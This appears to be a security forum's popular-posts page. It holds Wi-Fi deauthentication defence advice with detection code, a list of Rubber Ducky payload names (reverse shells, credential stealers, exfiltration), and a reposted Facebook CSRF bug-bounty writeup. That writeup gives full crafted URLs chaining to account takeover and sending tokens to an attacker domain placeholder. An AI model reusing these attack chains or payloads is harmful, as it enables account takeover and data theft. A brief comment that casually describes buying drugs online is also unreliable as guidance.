
Leaderboard


Popular Content

Showing content with the highest reputation on 02/15/19 in all areas

  1. 1 point
    Theoretically, there isn't much you can do against an attack of this kind; 802.11 allows it. This is more a threat-modeling problem than a technology problem. You could still make the attacker's life a bit harder; what comes to mind right now: most adapters/chipsets used for this only work on 2.4 GHz, and most tools that send deauthentication packets do it 'directionally' towards the clients of the targeted APs (if you don't know the AP, you don't know the clients for certain - careful, clients leak the names of the APs they are looking for and give you away). With these two things in mind, you can use a dual-band router strictly on 5 GHz, or, if networks on both frequency bands (2.4 and 5) are needed, you make sure the names of the two networks have no relation to each other and that their MACs are very different - most vendors only change the last 1-2 bytes between the Wi-Fi networks on the same device. Why can't you afford for the clients to lose the connection anyway? A simple check can be implemented that lets the system keep running without clients, given that re-authentication happens very quickly. There would also be the option of communicating over BT, but you said a change of technology is not being considered, and there are big risks there too.
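    Added example (not from the reply above or from any tool it mentions): detection logic for a deauthentication burst, run over a constructed list of management-frame records, plus the BSSID-relatedness check the reply recommends for dual-band setups.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp, seconds
    subtype: str   # management subtype: "beacon", "deauth", "probe_req", ...
    bssid: str     # BSSID the frame claims to come from
    dst: str       # destination (client MAC or broadcast)

# Constructed sample, not a real capture: one beacon, then twelve deauths
# forged against AP ...:01 inside 1.2 s, and a single deauth on AP ...:02.
SAMPLE = (
    [Frame(0.0, "beacon", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff")]
    + [Frame(1.0 + i * 0.1, "deauth", "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff")
       for i in range(12)]
    + [Frame(5.0, "deauth", "aa:bb:cc:dd:ee:02", "11:22:33:44:55:66")]
)

def deauth_bursts(frames, window=2.0, threshold=5):
    """Flag each BSSID the first time more than `threshold` deauth frames are
    seen within a sliding `window` of seconds. Returns (bssid, ts, count)."""
    recent = defaultdict(deque)
    flagged, alerts = set(), []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype != "deauth":
            continue
        q = recent[f.bssid]
        q.append(f.ts)
        while q and f.ts - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold and f.bssid not in flagged:
            flagged.add(f.bssid)
            alerts.append((f.bssid, round(f.ts, 1), len(q)))
    return alerts

def bssids_trivially_linked(mac_a, mac_b):
    """True when two BSSIDs share their first four octets, i.e. differ only in
    the last 1-2 bytes (the vendor default the reply warns about), which lets
    an observer infer the 5 GHz BSSID from the 2.4 GHz one."""
    a, b = mac_a.lower().split(":"), mac_b.lower().split(":")
    return a != b and a[:4] == b[:4]
```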
  2. 1 point
  3. 1 point
    Watch out you don't get shot, t/c Edit// go to Holland if you want to smoke, Edit2: Obama had 100 million on his head for a sniper, Merkel 500, stay in your lane Edit3/// you pay about 70 € round trip and smoke yourself silly, all inclusive
  4. 1 point
    Links:
    https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads - candy
    https://roothaxor.gitlab.io/ducky2arduino_stable/ - Ducky to Arduino Convertor
    Payloads listed there:
    - Hello World
    - WiFi key grabber
    - Basic Terminal Commands Ubuntu
    - Information Gathering Ubuntu
    - Hide CMD Window
    - Netcat-FTP-download-and-reverse-shell
    - Wallpaper Prank
    - YOU GOT QUACKED!
    - Reverse Shell
    - Reverse Shell With Persistence
    - Fork Bomb
    - Utilman Exploit
    - WiFi Backdoor
    - Non-Malicious Auto Defacer
    - Lock Your Computer Message
    - Ducky Downloader
    - Ducky Phisher
    - FTP Download / Upload
    - Restart Prank
    - Silly Mouse, Windows is for Kids
    - Windows Screen rotation hack
    - Powershell Wget + Execute
    - mimikatz payload
    - MobileTabs
    - Create Wireless Network Association (AUTO CONNECT) PINEAPPLE
    - Retrieve SAM and SYSTEM from a live file system
    - Ugly Rolled Prank
    - XMAS
    - Pineapple Association (VERY FAST)
    - WiFun v1.1
    - MissDirection
    - Remotely Possible
    - Batch Wiper/Drive Eraser
    - Generic Batch
    - Paint Hack
    - Local DNS Poisoning
    - Deny Net Access
    - RunEXE from SD
    - Run Java from SD
    - OSX Sudo Passwords Grabber
    - OSX Root Backdoor
    - OSX User Backdoor
    - OSX Local DNS Poisoning
    - OSX Youtube Blaster
    - OSX Photo Booth Prank
    - OSX Internet Protocol Slurp
    - OSX Ascii Prank
    - OSX iMessage Capture
    - OSX Grab Minecraft Account Password and upload to FTP
    - OS X Wget and Execute
    - OSX Passwordless SSH access (ssh keys)
    - OSX Bella RAT Installation
    - OSX Sudo for all users without password
    - MrGray's Rubber Hacks
    - Copy File to Desktop
    - Youtube Roll
    - Disable AVG 2012
    - Disable AVG 2013
    - EICAR AV test
    - Download mimikatz, grab passwords and email them via gmail
    - Hotdog Wallpaper
    - Android 5.x Lockscreen
    - Chrome Password Stealer
    - Website Lock
    - Windows 10 : Download & Change Wallpaper
    - Windows 10 : Download & Change Wallpaper another version
    - Windows 10 : Download and execute file with Powershell
    - Windows 10 : Disable windows defender
    - Windows 10 : Disable Windows Defender through powershell
    - Windows 10 : Wifi, Chrome Dump & email results
    - Windows 7 : Logoff Prank
    - Netcat Reverse Shell
    - Fake Update screen
    - Rickroll
    - Fast Meterpreter
    - Data-Exfiltration / Backdoor
  5. 1 point
  6. 1 point
  7. 1 point
    Posted on February 12, 2019 by qw

    Facebook CSRF protection bypass which leads to Account Takeover.

    This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook, which could lead to takeover of victims' accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link.

    Demonstration

    This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and makes a POST request to that endpoint after adding the fb_dtsg parameter. Also, this endpoint is located under the main domain www.facebook.com, which makes it easier for the attacker to trick his victims into visiting the URL.

    The vulnerable endpoint is: https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body). This allowed me to perform many actions if the victim visits these URLs. Some of these are:

    Make a post on timeline:
    https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}

    Delete Profile Picture:
    https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID}

    Trick user to delete their account (after changing language with the "locale" parameter):
    https://www.facebook.com/comet/dialog_DONOTUSE/?url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR
    This will prompt a password confirmation dialog; if the victim enters his password, his account will be deleted.

    Account Takeover Approach

    To take over the account, we have to add a new email address or phone number to the victim's account. The problem here is that the victim has to visit two separate URLs, one to add the email/phone and one to confirm it, because the "normal" endpoints used to add emails or phone numbers don't have a "next" parameter to redirect the user after a successful request. So to bypass this, I needed to find endpoints where the "next" parameter is present so the account takeover could be made with a single URL.

    1) We authorize the attacker app as the user, then we redirect to https://www.facebook.com/v3.2/dialog/oauth which will automatically redirect to the attacker website with access_token having the scopes allowed to that app (this happens without user interaction because the app is already authorized using the endpoint /ajax/appcenter/redirect_to_app). This URL should be sent to the user:
    https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog
    This step is needed for multiple things: first, to use the endpoint /v3.2/dialog/oauth to bypass Facebook redirect protection in the "next" parameter, which blocks redirecting attempts to external websites even if they are made using linkshim. Second, to identify each victim using the token received, which will help later to extract the confirmation code for that specific user.

    2) The attacker website receives the access token of the user, creates an email for him under that domain and redirects the user to:
    https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK}
    This URL does the following: first, it links an email to the user account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required). After the linking, it redirects to the selected endpoint in the "next" parameter: "/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}" which will redirect to the "ATTACKER_DOMAIN" again with the user access_token.

    3) The attacker website receives the "access_token", extracts the user ID, then searches for the email received for that user, gets the confirmation link and redirects again to:
    https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH}
    (CODE and HASH are in the email received from Facebook.) This method is simpler for the attacker, but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email which exposes the newly added email, so the confirmation could be done using the /confirm_code/dialog/submit/ endpoint, which has a "next" parameter that could redirect the victim to the home page after the confirmation is made.

    4) The email is now added to the victim's account; the attacker could reset the password and take over the account.

    The attack seems long, but it's done in a blink of an eye, and it's dangerous because it doesn't target a specific user but anyone who visits the link in step 1 (this is done with simple scripts hosted on the attacker website).

    Timeline
    Jan 26, 2018 — Report Sent
    Jan 26, 2018 — Acknowledged by Facebook
    Jan 28, 2018 — More details sent
    Jan 31, 2018 — Fixed by Facebook
    Feb 12, 2018 — $25,000 Bounty Awarded by Facebook

    Source: https://ysamm.com/?p=185
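    Added example, not part of the writeup above and not Facebook's code: the server-side checks a proxying "dialog" endpoint like the one described needs in order not to become a CSRF primitive. The target allowlist and the attacker hostname are constructed; the check also walks nested next=/redirect_uri= values the way the writeup's double encoding chains them.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed allowlist of targets the dialog may POST to. The real list is not
# on the page; the point is that an open "url=" parameter must not exist.
ALLOWED_DIALOG_TARGETS = {"/help/about_dialog/", "/help/contact_dialog/"}
REDIRECT_PARAMS = ("next", "redirect_uri")

def same_origin_relative(value):
    """A proxy or redirect target is safe only as a path on this origin:
    no scheme, no authority, and not protocol-relative (//host)."""
    parts = urlsplit(value)
    return (parts.scheme == "" and parts.netloc == ""
            and value.startswith("/") and not value.startswith("//"))

def redirect_chain_ok(target, depth=0):
    """Walk nested next= / redirect_uri= values. Each hop is percent-decoded
    once by the endpoint that consumes it, so parse_qs (one decode per level)
    models the hop-by-hop decoding that the double-encoded chain relies on."""
    if depth > 5 or not same_origin_relative(target):
        return False
    query = parse_qs(urlsplit(target).query)
    for name in REDIRECT_PARAMS:
        for nested in query.get(name, []):
            if not redirect_chain_ok(nested, depth + 1):
                return False
    return True

def check_dialog_request(url_param, request_token, session_token):
    """Decide whether the dialog endpoint may proxy a POST to url_param.
    Returns 'allow' or a 'reject: ...' reason."""
    target = unquote(url_param)
    if not same_origin_relative(target):
        return "reject: external or absolute target"
    if urlsplit(target).path not in ALLOWED_DIALOG_TARGETS:
        return "reject: target not allowlisted"
    if not redirect_chain_ok(target):
        return "reject: nested redirect leaves the origin"
    # The anti-CSRF token must be supplied by the caller (e.g. a hidden form
    # field) and never injected by the endpoint itself, otherwise any plain
    # link becomes an authenticated POST on the victim's behalf.
    if not request_token or request_token != session_token:
        return "reject: missing or invalid CSRF token"
    return "allow"
```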
  8. -1 points
    I suggest you avoid the dark web; some things there are more horrifying than you'd think, my opinion!
  9. -2 points
    I have friends who ordered weed from the deep web and it arrived without any problem, maximum discretion etc, and you're fine, though there will still be someone who ends up as the scapegoat, life is life.